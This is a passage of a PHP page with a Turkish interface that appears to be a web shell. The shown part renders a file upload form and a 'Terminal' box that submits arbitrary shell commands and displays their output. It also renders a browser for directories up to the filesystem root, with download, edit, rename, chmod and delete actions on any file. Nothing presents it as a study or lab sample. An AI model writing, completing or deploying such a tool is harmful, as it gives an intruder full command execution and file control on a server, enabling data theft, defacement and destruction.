<input type="file" name="upload_file" style="font-family:monospace;font-size:13px">
<input type="submit" value="Yükle">
</form>
</div>
<!-- TERMİNAL -->
<div class="terminal-box">
<form method="POST" action="?do=terminal&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="terminal">
<b>Terminal:</b>
<input type="text" name="tcmd" placeholder="komut girin..." size="60" value="<?php echo htmlspecialchars($_POST['tcmd'] ?? ''); ?>" autofocus>
<input type="submit" value="Çalıştır">
</form>
<?php if ($terminal_output !== ''): ?>
<div class="terminal-output"><?php echo htmlspecialchars($terminal_output); ?></div>
<?php endif; ?>
</div>
<!-- DOSYA LİSTESİ -->
<table>
<tr>
<th>Ad</th>
<th>Boyut</th>
<th>İzin</th>
<th>Değiştirilme</th>
<th>İşlem</th>
</tr>
<?php
// Parent directory: the [..] row is shown only when dirname() yields a different path,
// i.e. not at the filesystem root.
$parent = dirname($dir);
if ($parent !== $dir):
?>
<tr>
<td><a href="?dir=<?php echo urlencode($parent); ?>">[..]</a></td>
<td>-</td><td>-</td><td>-</td><td>-</td>
</tr>
<?php endif; ?>
<?php
// Directory listing for the current directory; an unreadable directory lists as empty.
$items = @scandir($dir);
if ($items === false) $items = [];
// Directories first, then files
$dirs = [];
$files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $dir . '/' . $item;
if (is_dir($full)) $dirs[] = $item;
else $files[] = $item;
}
// Case-insensitive string sort within each group.
sort($dirs, SORT_STRING | SORT_FLAG_CASE);
sort($files, SORT_STRING | SORT_FLAG_CASE);
foreach ($dirs as $item):
$full = $dir . '/' . $item;
?>
<tr>
<td><b><a href="?dir=<?php echo urlencode($full); ?>">[<?php echo htmlspecialchars($item); ?>]</a></b></td>
<td>-</td>
<td><?php echo fmt_perms($full); ?></td>
<td><?php echo date('Y-m-d H:i', @filemtime($full)); ?></td>
<td>
<a href="?do=renameform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Rename</a>
<a href="?do=chmodform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Chmod</a>
<a href="?do=delete&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>" onclick="return confirm('Bu klasörü silmek istediğinize emin misiniz?')">Delete</a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $item):
$full = $dir . '/' . $item;
?>
<tr>
<td><?php echo htmlspecialchars($item); ?></td>
<td><?php echo fmt_size(@filesize($full)); ?></td>
<td><?php echo fmt_perms($full); ?></td>
<td><?php echo date('Y-m-d H:i', @filemtime($full)); ?></td>
<td>
<a href="?do=download&f=<?php echo urlencode($full); ?>">Download</a>
<a href="?do=edit&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Edit</a>
<a href="?do=renameform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Rename</a>
<a href="?do=chmodform&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>">Chmod</a>
<a href="?do=delete&f=<?php echo urlencode($full); ?>&dir=<?php echo urlencode($dir); ?>" onclick="return confirm('Bu dosyayı silmek istediğinize emin misiniz?')">Delete</a>
</td>
</tr>
<?php endforeach; ?>
</table>
<?php endif; ?>
</body>
</html>